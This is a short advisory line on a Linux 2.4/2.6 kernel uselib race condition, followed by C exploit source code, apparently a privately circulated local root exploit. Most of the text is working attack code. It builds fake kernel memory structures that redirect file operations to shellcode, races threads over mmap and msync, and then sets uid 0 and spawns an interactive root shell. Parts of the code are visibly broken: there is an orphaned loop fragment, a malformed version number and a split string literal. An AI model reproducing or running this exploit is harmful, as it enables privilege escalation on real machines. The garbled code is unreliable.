A Race condition in the load_elf_library and binfmt_aout function calls for uselib in Linux kernel 2.4 through 2.429-rc2 and 2.6 through 2.6.10 allows local users to execute arbitrary code by manipulating the VMA descriptor.
Exploit:
/*
* pwned.c - linux 2.4 and 2.6 sys_uselib local root exploit. PRIVATE.
* it's not the best one, the ldt approach is definitively better.
* discovered may 2004. no longer private because lorian/cliph/ihaquer
* can lick my balls.
* (c) 2004 sd <sd@fucksheep.org>
* requieres cca 1gb on fs.
*/
/*
* first create fake vma structs.
*
*
* let's have 3 threads, t1, t2 and t3.
* t1 and t2 have common vm.
*
* t3:
* - wait4sig (will come back from t2)
* - write(fd3, bigmem, bigfile_size)
* - exit()
* t1:
* - fd3 = empty file
* - fd1 = bigfile, writing it took 16 secs
* - bigmem = mmap(NULL, bigfile_size, fd1, 0);
* - t3 = fork()
* - t2 = clone()
* - fd2 = munmap_file, size of ram.
* - mumem = mmap(NULL, munmap_file_size, fd2)
* - mmap(mumem, 4096, ANONYMOUS) // for extending do_brk check
* - mmap lots of vmas
* - close(fd2);
* - create evil lib
* - free lot of vmas
* - sig @ t2
* - evil_lib->do_munmap(mumem + 4096, munmap_file_size - 4096);
* - sem = 1
* - waitpid
* t2:
* - wait4sig
* - sleep(100msec)
* - mmap(mumem, fd3, 4096) // this is being protected by i_sem !
* - sendsig @ t3
* - sleep(100msec)
* - if (sem) error
* - msync(mumem, 8192) - will wait for write() to finish. munmap finishes by that
* time
* - if (!sem) error
* - if it does return we failed, otherwise shell.
*
*/
static char thread_stack[16384];
int fd1, fd2, fd3;
char buf[MAPSTEP];
int notincore;
int t4;
int t3;
int t2;
int bigsize = 0;
char *bigmem = NULL;
int swapsize = 0;
char *swapmem = NULL;
char *base = BASE;
char *vmamem;
int gotsig = 0;
int sem = 0;
#define cleanup() _cleanup(__func__, __LINE__)
void killall()
{
if (t2 != getpid())
kill(t2, SIGKILL);
if (t3 != getpid())
kill(t3, SIGKILL);
if (t4 != getpid())
kill(t4, SIGKILL);
}
void _cleanup(const char *name, int line)
{
printf("cleanup called! from %s:%d\n", name, line);
killall();
unlink(SHAREFILE);
unlink(SWAPFILE);
unlink(EATFILES);
unlink(EATFILE);
unlink(LIBFILE);
_exit(1);
}
#define FAKES_BASE 0x50000000
struct fakes {
int t1;
struct mm_struct mm;
struct vma_struct vma;
struct file_struct file;
struct dentry_struct dentry;
unsigned long mapping24[128];
unsigned long mapping26[128];
unsigned long inode[128];
unsigned long pgd[1024];
void *ptrs[128];
char shellcode[sizeof(shellcode)];
int t2;
};
struct fakes *fakes = (void *) FAKES_BASE;
/* build the fake vma which msync_interval will get
* we've to emulate a lot of things!
*/
void build_fakevma()
{
int i;
memset(fakes, 0, sizeof(*fakes));
fakes->vma.vm_end = (unsigned)( base + PAGE_SIZE * 2);
fakes->vma.vm_start = (unsigned)(base + PAGE_SIZE);
/* we need this to let the kernel enter the fs callback we control */
fakes->vma.vmflags = 0xf;
fakes->vma.file = &fakes->file;
fakes->vma.mm = &fakes->mm;
fakes->mm.pgd1 = fakes->pgd;
fakes->mm.pgd2 = fakes->pgd;
fakes->mm.pgd3 = fakes->pgd;
/* there are no pmd's */
memset(fakes->pgd, 0, sizeof(fakes->pgd));
/* initialize potential spinlock on smp */
for (i = 0; i < 32; i++)
fakes->mm.locks[i] = 1;
/* 2.4 goes thru dentry */
fakes->file.dentry = &fakes->dentry;
fakes->dentry.inode1 = fakes->inode;
fakes->dentry.inode2 = fakes->inode;
/* this will be i_sem */
for (i = 0; i < 32; i++)
fakes->inode[i] = 1;
/* and this reference to i_mapping */
for (i = 32; i < 128; i++)
fakes->inode[i] = (unsigned long) fakes->mapping24;
/* 2.6 goes thru f_mapping */
for (i = 0; i < 64; i++)
fakes->file.f_mapping[i] = fakes->mapping26;
/* prepare mmappings for both 2.4 and 2.6 */
/* mapping on 2.6 requieres to have ->host defined.
and backing_dev_info pointing to bunch of nonzero memory.
also locked_pages list must point to itself (empty) */
fakes->mapping26[0] = (unsigned long) fakes->inode;
for (i = 1; i <= 3; i++)
fakes->mapping26[i] = 0;
for (i = 4; i < 16; i++)
fakes->mapping26[i] = (unsigned long) &fakes->mapping26[i];
for (i = 16; i <= 30; i++)
fakes->mapping26[i] = (unsigned long) fakes->ptrs;
/* mapping on 2.4 requieres only having mapping consisting of empty lists */
for (i = 0; i <= 30; i++)
fakes->mapping24[i] = (unsigned long) &fakes->mapping24[i];
for (i = 23; i <= 30; i++)
fakes->mapping24[i] = (unsigned long) fakes->ptrs;
/* ok, now setup fops->f_sync to our evil fsync */
fakes->file.op = fakes->ptrs;
for (i = 0; i < 128; i++)
fakes->ptrs[i] = fakes->shellcode;
memcpy(fakes->shellcode, shellcode, sizeof(shellcode));
}
for (i = 0; i < MAPSTEP; i += sizeof(void *))
*p++ = vma; /* !!! */
}
static void sighand(int d)
{
gotsig = 1;
}
static int thread(void *d)
{
int t3;
int ret;
int i;
wait4sig();
printf("(sleep1)\n");
usleep(300000);
printf("(sleep1 finished)\n");
printf("trying to mmap back the evil page\n");
for (i = 0; i < VMAFILL; i++) {
if (i == VMAFILL/2)
ret=mmap(swapmem + PAGE_SIZE * 2, PAGE_SIZE, PROT_READ|PROT_WRITE,MAP_SHARED|MAP_FIXED, fd3, 0);
mmap(vmamem + i * PAGE_SIZE, PAGE_SIZE, PROT_READ|((i&1)?(PROT_WRITE):(PROT_EXEC)),
MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
}
swapmem[PAGE_SIZE*2] = 'x';
printf("%p, evil mapped\n",ret);
printf("(sleep2)\n");
if (sem)
cleanup();
sendsig(t3);
usleep(300000);
printf("(sleep2 finished)\n");
if (sem)
cleanup();
munmap(vmamem, VMAFILL * PAGE_SIZE);
printf("doing msync\n");
printf("still doing msync\n");
ret = msync(swapmem + PAGE_SIZE * 2, PAGE_SIZE * 4, MS_SYNC);
printf("finished msync, %d, errno=%d\n", ret, errno);
if (ret == -1 && errno == 123) {
sem = 0;
killall();
printf("y4'r3 1uCky k1d!\n");
setresuid(0, 0, 0);
setresgid(0, 0, 0);
execl("/bin/sh", "sh", "-i", NULL);
printf("execve failed %d\n", errno);
}
if (!sem) {
printf(":(\n");
cleanup();
}
_exit(0);
}
int main(int argc, char *argv[])
{
int i, n;
char *dummy = DBASE;
printf("linux kernel msync race condition\nbug discovered by sd,
further research by sd and *****\nthis is development-in-progress code,
redistribution prohibited!\n=============================================\n");